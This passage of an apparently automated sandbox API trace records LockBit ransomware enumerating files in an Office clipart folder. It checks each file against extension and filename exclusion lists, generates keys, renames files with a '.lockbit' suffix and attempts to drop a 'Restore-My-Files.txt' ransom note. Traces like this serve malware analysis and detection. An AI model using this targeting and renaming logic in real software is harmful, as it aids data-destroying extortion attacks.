lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.516] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.lockbit") returned 72 [0114.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0114.516] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.516] malloc (_Size=0x40068) returned 0x1ff1e60 [0114.516] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=42704) returned 1 [0114.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0114.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0114.517] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.522] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.522] malloc (_Size=0xa6) returned 0x77d7a8 [0114.522] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.523] free (_Block=0x77d7a8) [0114.523] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.523] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.523] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.523] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fdeb00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95fdeb00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x3b3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00965_.WMF", cAlternateFileName="")) returned 1 [0114.523] lstrcmpiW (lpString1=".", lpString2="FD00965_.WMF") returned -1 [0114.523] lstrcmpiW (lpString1="..", lpString2="FD00965_.WMF") returned -1 [0114.523] PathFindExtensionW (pszPath="FD00965_.WMF") returned=".WMF" [0114.523] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.523] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.523] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.523] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.523] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.523] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.523] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.523] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.523] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.524] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.524] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00965_.WMF") returned 1 [0114.525] lstrcmpiW (lpString1="ntldr", lpString2="FD00965_.WMF") returned 1 [0114.525] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00965_.WMF") returned 1 [0114.525] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00965_.WMF") returned -1 [0114.525] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00965_.WMF") returned -1 [0114.525] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00965_.WMF") returned 1 [0114.525] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00965_.WMF") returned 1 [0114.525] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.525] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned=".WMF" [0114.525] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.525] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.525] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.526] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.536] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.537] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.537] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.lockbit") returned 72 [0114.537] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0114.544] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.545] malloc (_Size=0x40068) returned 0x3e70008 [0114.545] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=15164) returned 1 [0114.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0114.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0114.546] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0114.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.548] malloc (_Size=0xa6) returned 0x77d7a8 [0114.548] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.549] free (_Block=0x77d7a8) [0114.549] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.550] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.550] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9963a600, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9963a600, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x121a, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01074_.WMF", cAlternateFileName="")) returned 1 [0114.550] lstrcmpiW (lpString1=".", lpString2="FD01074_.WMF") returned -1 [0114.550] lstrcmpiW (lpString1="..", lpString2="FD01074_.WMF") returned -1 [0114.550] PathFindExtensionW (pszPath="FD01074_.WMF") returned=".WMF" [0114.550] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.550] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.551] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.551] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.552] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01074_.WMF") returned 1 [0114.552] lstrcmpiW (lpString1="ntldr", lpString2="FD01074_.WMF") returned 1 [0114.552] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01074_.WMF") returned 1 [0114.552] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01074_.WMF") returned -1 [0114.552] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01074_.WMF") returned -1 [0114.552] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01074_.WMF") returned 1 [0114.553] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01074_.WMF") returned 1 [0114.553] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.553] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned=".WMF" [0114.553] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.553] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.553] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.554] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.554] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.lockbit") returned 72 [0114.554] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0114.555] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.555] malloc (_Size=0x40068) returned 0x3ef0008 [0114.555] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=4634) returned 1 [0114.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0114.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0114.556] ReadFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0114.568] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.568] malloc (_Size=0xa6) returned 0x77d7a8 [0114.568] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.569] free (_Block=0x77d7a8) [0114.569] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.569] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.569] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.569] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf455c700, ftCreationTime.dwHighDateTime=0x1bd4be8, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf455c700, ftLastWriteTime.dwHighDateTime=0x1bd4be8, nFileSizeHigh=0x0, nFileSizeLow=0x96c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01084_.WMF", cAlternateFileName="")) returned 1 [0114.569] lstrcmpiW (lpString1=".", lpString2="FD01084_.WMF") returned -1 [0114.569] lstrcmpiW (lpString1="..", lpString2="FD01084_.WMF") returned -1 [0114.569] PathFindExtensionW (pszPath="FD01084_.WMF") returned=".WMF" [0114.569] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.569] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.569] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.569] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.569] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.569] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.569] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.569] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW 